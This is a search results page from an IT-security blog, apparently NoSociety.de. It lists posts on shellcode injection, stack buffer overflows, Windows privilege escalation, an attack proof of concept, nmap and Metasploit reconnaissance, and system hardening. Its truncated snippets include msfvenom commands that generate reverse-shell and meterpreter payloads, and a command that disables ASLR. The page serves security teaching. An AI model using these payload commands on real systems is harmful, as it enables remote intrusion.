Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Shellcode Injection Part 1

Shellcode Injection Part 1 @en:it-security:blog: 31 Treffer, Zuletzt geändert: vor 19 Stunden; sführt.((https://www.ired.team/offensive-security/code-injection-process-injection/process-injection)) I... rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); co
Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog: 40 Treffer, Zuletzt geändert: vor 13 Tagen; ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog: 36 Treffer, Zuletzt geändert: vor 13 Tagen; ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog: 23 Treffer, Zuletzt geändert: vor 13 Tagen; 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
Privilege escalation: Windows admin thanks to Linux @en:it-security:blog: 12 Treffer, Zuletzt geändert: vor 13 Tagen; ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
FatCat Attack PoC @en:it-security:blog: 14 Treffer, Zuletzt geändert: vor 2 Monaten; rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete
Helpful NMAP scanner commands: 30 Treffer, Zuletzt geändert: vor 3 Monaten; === Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
SMB Hardening: 14 Treffer, Zuletzt geändert: vor 3 Monaten; Powershell (admin rights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> SMBv1 can also be deactivated via Powershell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> === Server === The same commands apply to ser
Secure passwords: 4 Treffer, Zuletzt geändert: vor 3 Monaten; h your own secure password. We form a sentence: <code text> Ich bilde einen Satz mit Groß- & Kleinbuchstaben und den Zahlen 0 und 9 </code> We take the first letters of the sentence, the ... haracter and the numbers and form the password: <code text> IbeSmG&KudZ0u9 </code> This is a quick and easy way to create a password that you will remember.
OSI layer cyber attacks: 3 Treffer, Zuletzt geändert: vor 3 Monaten; tion]], [[wp>Cross-Site-Scripting]] , [[wp>Remote Code Execution]] | @#ff34b3: **Application** | @#c1ffc... application firewall (WAF) | | @lightsalmon: [[wp>Code_Injection|Code Injection]], Data Format Manipulation, Serialisation Attacks | @#ff34b3: **Representatio
nmap SMBv1 Scan via Script: 6 Treffer, Zuletzt geändert: vor 3 Monaten; b/smb.lua ===== Insert the following function: <code lua> function list_smbv1dialect(host, overrides) ... te end return true, supported_dialects end </code> ===== nmap/scripts/smbv1.nse ===== <code lua> local smb = require "smb" local stdnse = require "stdn... ething may be blocking the responses" end end </code> ===== Start scan ===== <code bash> nmap -p139,
Host Discovery with Metasploit database: 14 Treffer, Zuletzt geändert: vor 3 Monaten; r it. ===== Metasploit: Connect database ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Check connection ==== <code ruby> msf6 > db_status [*] Connected to db_name. Connection type: postgresql. Connection name: local_db_service. </code> ===== Metasploit: Create workspace ===== <code
Group Managed Service Accounts: 22 Treffer, Zuletzt geändert: vor 3 Monaten; Preparations ===== Create root key on the DC: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Then wait 10 hours to ensure that the replicati... MSA account ===== ==== Create ==== On the DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== test ==== On the target system: <code po

Suche

Passende Seitennamen:

Volltextergebnisse:

NoSociety.de